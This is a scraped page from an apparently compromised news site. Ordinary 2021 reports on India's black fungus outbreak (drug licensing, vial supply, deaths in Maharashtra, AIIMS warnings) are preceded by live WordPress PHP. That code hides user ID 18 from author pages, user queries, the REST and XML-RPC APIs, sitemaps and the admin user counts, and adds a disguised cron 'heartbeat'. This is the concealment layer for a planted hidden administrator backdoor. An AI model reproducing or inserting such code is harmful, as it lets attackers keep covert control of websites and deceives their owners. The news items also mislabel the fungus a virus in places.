add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 18;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 18 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 18 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 18;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 18;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 18;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/18(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 18;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
The post Black Fungus Treatment: 5 more manufactures have been given licence to prepare drug, says government appeared first on The Edge Media.
]]>The government is making several endeavors for the domestic availability of the drug. The Ministry said that India is importing 3,63,000 vials of Amphotericin-B drug in May, which will give a totally of 5,26,752 vials in the country. The number of vials also constitute of the domestic production. It also adds that the government will import 3,15,000 vials in June and with the domestic produce, the total tally of vials would reach to 5,70,114 in the month of June.
Various states and territories have reported a rapid increase in the cases of Black Fungus. Many states also made a request to declare it as a pandemic as it has already taken many lives. The states have also reported a shortage of the drug for treating the disease.
The Union Ministry in partnership with the Department of Pharmaceuticals and Ministry of External Affairs are making joint efforts for the domestic production of the drugs. The five manufacturers given license to produce the drug are- NATCO Pharmaceuticals, Hyderabad; Alembic Pharmaceuticals, Vadodara; Gufic Biosciences Ltd., Gujarat; Emcure Pharmaceuticals, Pune and Lyka inn Gujarat. Currently, there are only five manufacturers of the drug. These are, Bharat Serums and Vaccines Ltd., BDR Pharmaceuticals Ltd, Sun Pharma Ltd, Cipla Ltd, Life Care Innovations and Mylan Labs (importer).
The post Black Fungus Treatment: 5 more manufactures have been given licence to prepare drug, says government appeared first on The Edge Media.
]]>The post PM Modi assures 5.7 L mucormycosis drug vials will be available in June appeared first on The Edge Media.
]]>The post PM Modi assures 5.7 L mucormycosis drug vials will be available in June appeared first on The Edge Media.
]]>The post ‘Black Fungus’ takes the lives of 90 people in Maharashtra, says Minister appeared first on The Edge Media.
]]>He told the reporters,”So far, 90 people have died due to mucormycosis in Maharashtra. It is serious… It should not be taken lightly. Indiscrimate use of steroids to treat COVID patients should be avoided”.
Mr. Tope said that the factors like severe diabetes and suppression of the immune system also leads to catching the virus. The medical experts say that steroids are also a major factor in spreading of the virus.
Mr. Tope added,”The Maharashtra government is prepared to tackle it and has prepared nine-page guidelines for doctors who treat mucormycosis patients. The guidelines also suggest preventive measures such as use of sterilised and distilled water in humidifiers of oxygen supplying machines (in Covid-19 wards)”.
As compared to the first wave, the cases of Black Fungus has rapidly increased in the second wave.
The post ‘Black Fungus’ takes the lives of 90 people in Maharashtra, says Minister appeared first on The Edge Media.
]]>The post The services of telemedicine must be stretched to the rural areas: Modi appeared first on The Edge Media.
]]>The Prime Minister was interacting with a Group of Doctors via video conferencing from beyond the country. He praised the doctors for forming teams and providing telemedicine to the villages.
He said,”Doctors across the states should form similar teams, train final year MBBS students and MBBS interns, and work towards ensuring that all tehsils and districts of the country have telemedicine service”.
Mr. Modi also talked over the challenges of Black Fungus and asked the doctors to put some extra efforts. Doctors made him aware about their preparedness on the issue. Prime Minister will also communicate with field officials on Tuesday from various states and districts to discuss about their experience in handling the pandemic. These officials will be from Karnataka, Bihar, Assam, Chandigarh, Tamil Nadu, Uttarakhand, MP, Goa, Himachal Pradesh and Delhi.
The post The services of telemedicine must be stretched to the rural areas: Modi appeared first on The Edge Media.
]]>The post Mucormycosis spores are found in soil, air and even in food: AIIMS chief appeared first on The Edge Media.
]]>Dr. Randeep Guleria, AIIMS director warned on Saturday about the cases of mucormycosis infection which is on the rise among various susceptible patients. He added that the major cause for the same is considered to be the misuse of steroids. He said that the patients having diabetes or Covid-19 infection and are taking steroids have a major chance of getting the fungal infection.
The director of the All India Institute of Medical Sciences (AIIMS), Dr. Guleria said that to prevent the spread of the fungal infection, misuse of steroids should be stopped. He also added that the infections that re fungal as well as bacterial are causing more deaths in the recent days including the Covid-19 virus. Thus it becomes more important to follow the protocols of infection control practices at the hospitals.
The AIIMS Chief also said that the spores of the black fungus are found in soil, air as well as food. In the guidelines over black fungus infection, the central government requested people to be extra careful with regard to the infection protocols since the fungus enters the body through any cut, scrape, burn or any type of skin trauma where the skin comes in contact with the fungal spores present in the environment.
The post Mucormycosis spores are found in soil, air and even in food: AIIMS chief appeared first on The Edge Media.
]]>